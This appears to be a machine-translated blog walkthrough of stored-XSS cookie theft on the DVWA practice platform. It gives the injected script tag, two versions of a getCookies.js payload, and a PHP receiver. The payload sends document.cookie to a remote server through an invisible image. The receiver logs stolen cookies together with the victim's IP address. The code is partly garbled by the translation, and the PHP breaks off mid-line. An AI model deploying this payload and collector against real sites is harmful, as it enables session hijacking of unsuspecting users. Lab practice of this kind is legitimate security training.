XSS Cookie Theft (DVAW platform test)

XSS Cookie Theft (DVAW platform test)

In the face of the competition, one question was to write a script to receive Cookies, so I simulated the XSS environment.

PS: WAF filtering is not considered.

First, the XSS is stored. Currently, the DVAW security level is low.

I haven't written a Web page for a long time-I forgot to write cross-origin code = xss in the first place.

First put a js file on the server, and xss loads it.

Loading xss is simple:

<script type="text/javascript" src="http://xxx.xxx.xxx.xx/getCookies.js"></script>

A piece of code that is easy to understand. js is introduced remotely. Creates a broken image and uses the error message mechanism to call the cccgood () function of js.

GetCookies. js:

Function cccgood () {// For ease of test without considering IE, friends are equipped with chromexican mlhttp = new XMLHttpRequest (); xmlhttp. open ("GET", "http://xxx.xxx.xxx.xxx/a.php? Ccc = "+ escape (document. cookie); xmlhttp. send ();}

Unfortunately-Origin null is not allowed by Access-Control-Allow-Origin.

0.0 .... So in another way, every src is a get ~~ Then, we can use an invisible img to go to src. Remote files are used to limit the number of words in Payload. Write as follows:

Function cccgood () {var img = document. createElement ("img"); img. src = "http://xxx.xxx.xxx.xxx/a.php? Ccc = "+ escape (document. cookie); document. body. appendChild ("img");} the escape () function can encode the string so that the string can be read on all computers. Prevent Cookies from carrying special characters.

In this way, cross-origin checks are successfully avoided.

Receive php code on a pay-as-you-go basis (provided by my friend @ Zero)

A. php

<?phpif(isset($_GET['ccc'])){if(!empty($_GET['ccc'])){$ccc = date("y-m-d h:i:s  ",time())." Cookies:".$_GET['ccc'];$user_IP = $_SERVER["REMOTE_ADDR"];$content="[".$user_IP."] ".$ccc;$fp=fopen("ccc.txt","a");fwrite($fp,$content."\r\n");fclose($fp);echo "Your Cookie :<br><br> $content<br><br><br>